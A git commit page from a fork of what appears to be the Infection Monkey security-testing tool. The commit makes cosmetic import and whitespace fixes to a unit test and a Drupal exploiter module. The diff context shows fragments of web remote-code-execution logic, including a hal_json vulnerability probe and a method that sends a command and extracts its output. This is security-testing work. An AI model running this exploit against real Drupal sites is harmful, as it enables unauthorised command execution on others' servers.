forked from p34709852/monkey
Update minor things in order to pass CI build
This commit is contained in:
parent
e7ecaa1744
commit
cec57c1604
|
@ -1,6 +1,7 @@
|
|||
from unittest import TestCase
|
||||
|
||||
from common.network.network_utils import get_host_from_network_location, remove_port
|
||||
from common.network.network_utils import (get_host_from_network_location,
|
||||
remove_port)
|
||||
|
||||
|
||||
class TestNetworkUtils(TestCase):
|
||||
|
|
|
@ -5,11 +5,13 @@ Implementation is based on:
|
|||
"""
|
||||
|
||||
import logging
|
||||
import requests
|
||||
from urllib.parse import urljoin
|
||||
|
||||
import requests
|
||||
|
||||
from common.network.network_utils import remove_port
|
||||
from infection_monkey.exploit.web_rce import WebRCE
|
||||
from infection_monkey.model import ID_STRING
|
||||
from network.network_utils import remove_port
|
||||
|
||||
__author__ = 'Ophir Harpaz'
|
||||
|
||||
|
@ -102,15 +104,15 @@ class DrupalExploiter(WebRCE):
|
|||
"value": ""
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
response = requests.get(f'{url}?_format=hal_json',
|
||||
json=payload,
|
||||
headers={"Content-Type": "application/hal+json"})
|
||||
|
||||
|
||||
if check_drupal_cache(response):
|
||||
LOG.info(f'Checking if node {url} is vuln returned cache HIT, ignoring')
|
||||
return False
|
||||
|
||||
|
||||
return 'INVALID_VALUE does not correspond to an entity on this site' in response.text
|
||||
|
||||
def exploit(self, url, command):
|
||||
|
@ -138,21 +140,21 @@ class DrupalExploiter(WebRCE):
|
|||
}
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
LOG.info(payload)
|
||||
|
||||
|
||||
r = requests.get(f'{url}?_format=hal_json', json=payload, headers={"Content-Type": "application/hal+json"})
|
||||
|
||||
|
||||
if check_drupal_cache(r):
|
||||
LOG.info(f'Exploiting {url} returned cache HIT, may have failed')
|
||||
|
||||
|
||||
if ID_STRING not in r.text:
|
||||
LOG.warning('Command execution _may_ have failed')
|
||||
|
||||
|
||||
result = r.text.split(ID_STRING)[-1]
|
||||
LOG.info(f'Drupal exploit result = {result}')
|
||||
return result
|
||||
|
||||
|
||||
def get_target_url(self):
|
||||
"""
|
||||
We're overriding this method such that every time self.exploit is invoked, we use a fresh vulnerable URL.
|
||||
|
|
Loading…
Reference in New Issue